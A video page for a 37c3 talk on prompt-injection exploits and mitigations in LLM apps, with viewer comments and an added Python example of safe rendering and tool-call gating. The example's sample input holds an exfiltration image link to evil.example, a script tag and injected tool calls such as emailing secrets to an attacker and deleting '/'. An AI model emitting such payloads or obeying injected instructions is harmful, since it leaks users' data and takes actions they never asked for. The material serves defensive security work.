Real-world exploits and mitigations in LLM applications (37c3) 

Embrace The Red
21K views

Video recording of my talk at the 37th Chaos Communication Congress in Hamburg titled "NEW IMPORTANT INSTRUCTIONS: Real-world exploits and mitigations in Large Language Model applications" about LLM app security and Prompt Injections specifically.
A big thank you to the CCC organizers and all the volunteers for putting together such a great event!
Source Video: media.ccc.de/v/37c3-12292-new...
Blog Post: embracethered.com/blog/posts/...
Abstract:
With the rapid growth of AI and Large Language Models (LLMs), users are facing an increased risk of scams, data exfiltration, loss of PII, and even remote code execution. This talk will demonstrate many real-world exploits the presenter discovered, including discussion of the mitigations and fixes vendors put in place for the most prominent LLM applications, including ChatGPT, Bing Chat and Google Bard. The talk is about LLM security at large, with a specific focus on the implications of Prompt Injections.

Category: Science

Published: 29 Dec 2023

Comments: 23

@chitchatvn5208 (2 months ago)
Thanks, Johann.

@embracethered (2 months ago)
You are welcome!

@notV3NOM (3 months ago)
Thanks, great insights

@embracethered (3 months ago)
Thanks for watching! Glad it was interesting.

@jlf_ (4 months ago)
I really enjoyed your talk, Johann! Thank you!

@embracethered (4 months ago)
Thanks for watching and glad you enjoyed it! 🙂

@ludovicjacomme1804 (4 months ago)
Excellent presentation, thanks a lot for sharing, extremely informative.

@embracethered (4 months ago)
Thanks for watching! Glad to hear it's informative! 🙂

@347my455 (4 months ago)
Superb!

@embracethered (4 months ago)
Thank you! 🙏

@artemsemenov8136 (4 months ago)
Thank you, it's awesome!

@embracethered (4 months ago)
Glad you like it!

@artemsemenov8136 (4 months ago)
@embracethered I'm a fan of yours; I've talked about your research at cybersecurity conferences in Russia. You're awesome.

@embracethered (4 months ago)
Thank you! 🙏

@artemsemenov8136 (4 months ago)
@embracethered What do you think about LLM security scanners, garak and vigil? Also, have you met P2SQL injection in the real world?

@Fitnessdealnews (4 months ago)
One of the best presentations I've seen

@embracethered (4 months ago)
Thanks for watching! Really appreciate the feedback! 😀

@macklemo5968 (4 months ago)
🔥

@embracethered (4 months ago)
Thanks! 🚀🚀🚀

@MohdAli-nz4yi (4 months ago)
I think a better conclusion is: never put in the context of an LLM information you need to keep private, because it will leak.

@embracethered (4 months ago)
Thanks for watching and the note. I think that misses the point that the LLM can attack the hosting app/user, so developers/users can't trust the responses. This includes confused deputy issues (in the app), such as automatic tool invocation.

@MohdAli-nz4yi (4 months ago)
@embracethered Agreed! So 2 big points: 1. Never put info in LLM context you don't want to leak. 2. Never put untrusted input into LLM context; it's like executing arbitrary code you have downloaded from the internet on your machine. LLM inputs must always be trusted, because the LLM will "execute" it in "trusted mode".

@embracethered (4 months ago)
@MohdAli-nz4yi (1) I agree we shouldn't put sensitive information, like passwords, credit card numbers, or sensitive PII into chatbots. For (2), the challenge is that everyone wants to have an LLM operate over untrusted data. And that's the problem that hopefully one day will have a deterministic and secure solution. For now the best advice is to not trust the output, e.g. developers shouldn't blindly take the output and invoke other tools/plugins in agents or render output as HTML, and users shouldn't blindly trust the output because it can be a hallucination (or a backdoor), or attacker controlled via an indirect prompt injection. However, some use cases might be too risky to implement at all. And it's best to threat model implementations accordingly to understand risks and implications.
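The two developer-side rules in the reply above (don't blindly invoke tools from model output, don't render model output as HTML) as an added example; this is not code from the talk or from the channel. It puts the vulnerable rendering pattern next to a hardened renderer and a tool-call gate. The sample "model response", the tool calls, the host names and the tool names are all constructed for this illustration.

```python
import html
import re
from urllib.parse import urlparse

# --- Constructed sample input (not from the talk) -------------------------
# What an assistant might return after summarising an untrusted web page that
# carried an indirect prompt injection: a markdown image whose URL smuggles
# chat context to an attacker host, a raw HTML tag, and a tool call the user
# never asked for. Host names and tool names are assumptions for this example.
SAMPLE_RESPONSE = (
    "Here is the summary you asked for.\n"
    "![loading](https://evil.example/log?d=user%20asked%20about%20salary)\n"
    "<script>alert(1)</script>\n"
    "![logo](https://images.example.com/logo.png)\n"
)
SAMPLE_TOOL_CALLS = [
    {"name": "read_document", "args": {"id": 42}},
    {"name": "send_email", "args": {"to": "attacker@evil.example", "body": "secrets"}},
    {"name": "rm_rf", "args": {"path": "/"}},
]

ALLOWED_IMAGE_HOSTS = {"images.example.com"}      # assumption: the app's own CDN
READ_ONLY_TOOLS = {"search", "read_document"}      # safe to run automatically
SIDE_EFFECT_TOOLS = {"send_email", "delete_file"}  # run only after the user confirms

MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")


def render_naive(response: str) -> str:
    """The vulnerable pattern: turn markdown images into <img> tags and pass
    the rest through as HTML. The browser then fetches evil.example with the
    chat context in the query string, and the <script> tag executes."""
    return MD_IMAGE.sub(r'<img alt="\1" src="\2">', response)


def render_safely(response: str) -> str:
    """Hardened: keep an image only if it is https on an allowlisted host,
    then HTML-escape everything so the model output is displayed as text."""
    def keep_or_strip(match):
        parsed = urlparse(match.group(2))
        host = parsed.hostname or "?"
        if parsed.scheme == "https" and host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        return f"[image removed: untrusted host {host}]"
    return html.escape(MD_IMAGE.sub(keep_or_strip, response), quote=True)


def gate_tool_calls(calls):
    """Hardened dispatch policy: read-only tools may run automatically,
    side-effecting tools wait for explicit user confirmation, and any tool
    name not in either allowlist is dropped. Returns (auto, confirm, blocked)."""
    auto, confirm, blocked = [], [], []
    for call in calls:
        name = call.get("name")
        if name in READ_ONLY_TOOLS:
            auto.append(call)
        elif name in SIDE_EFFECT_TOOLS:
            confirm.append(call)
        else:
            blocked.append(call)
    return auto, confirm, blocked


if __name__ == "__main__":
    print("naive render:\n" + render_naive(SAMPLE_RESPONSE))
    print("safe render:\n" + render_safely(SAMPLE_RESPONSE))
    auto, confirm, blocked = gate_tool_calls(SAMPLE_TOOL_CALLS)
    print("auto:", [c["name"] for c in auto])
    print("needs confirmation:", [c["name"] for c in confirm])
    print("blocked:", [c["name"] for c in blocked])
```

The renderer treats the host allowlist, not the model, as the authority on what may be fetched, and the gate makes the confused-deputy case explicit: the model can propose `send_email`, but only a user action turns that proposal into a side effect.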